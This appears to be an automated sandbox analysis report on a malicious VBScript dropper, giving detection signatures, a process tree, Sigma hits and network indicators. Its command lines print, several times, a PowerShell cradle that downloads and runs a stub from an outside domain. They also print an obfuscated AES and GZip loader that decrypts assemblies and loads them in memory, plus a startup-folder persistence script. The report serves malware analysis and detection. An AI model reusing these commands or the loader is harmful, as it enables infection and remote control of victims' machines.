
Windows Analysis Report
7299_output.vbs

Overview

General Information

Sample name: 7299_output.vbs
Analysis ID: 1573765
MD5: 023ae408481fd04c22f2a161266b7182
SHA1: 718f14dbeb0ff6b89a5189efe5e9cf940ba55d00
SHA256: 422fcf5c6b60ba6118a539ab69901d4821ab1bc044543deb5f73673b2b8f4e65
Tags: emptyservices-xyz, vbs, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 7532 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7636 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3428 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4268 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL 
([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 1436 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7272 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7696 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL 
([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 7584 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 7852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • timeout.exe (PID: 7860 cmdline: timeout /nobreak /t 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cmd.exe (PID: 4928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1312 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL 
([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5144 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • timeout.exe (PID: 3264 cmdline: timeout /nobreak /t 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7580, ProcessName: cmd.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ProcessId: 7532, ProcessName: wscript.exe
Source: Process started, Author: frack113, Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7636, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7580, ProcessName: cmd.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7580, ProcessName: cmd.exe
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ProcessId: 7532, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7636, ProcessName: powershell.exe

Data Obfuscation

Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd
No Suricata rule has matched


AV Detection

Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.2% probability
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: global traffic TCP traffic: 3.78.28.71 ports 13094,0,1,3,4,9
Source: DNS query: emptyservices.xyz
Source: global traffic TCP traffic: 192.168.2.4:49846 -> 3.78.28.71:13094
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: emptyservices.xyz
Source: global traffic DNS traffic detected: DNS query: 0.tcp.eu.ngrok.io
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1742529866.000001D081341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://emptyservices.xyz
Source: powershell.exe, 00000003.00000002.1742529866.000001D081778000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://emptyservices.xyz/stub
Source: powershell.exe, 00000003.00000002.1764714970.000001D0F58A4000.00000004.00000020.00020000.00000000.sdmp, 7299_output.vbs String found in binary or memory: https://emptyservices.xyz/stub.txt
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1742529866.000001D080C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C48D2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9EFD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
